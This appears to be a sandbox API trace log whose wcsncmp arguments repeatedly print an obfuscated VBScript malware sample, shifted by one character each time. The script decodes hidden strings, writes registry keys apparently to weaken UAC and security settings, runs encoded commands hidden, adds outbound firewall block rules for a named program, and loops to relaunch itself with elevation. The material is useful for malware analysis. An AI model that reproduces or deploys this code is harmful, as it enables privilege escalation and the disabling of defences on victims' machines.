bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.934] wcsncmp (_String1="sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.934] wcsncmp (_String1="x, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0222.935] wcsncmp (_String1=", x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.935] wcsncmp (_String1=" x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 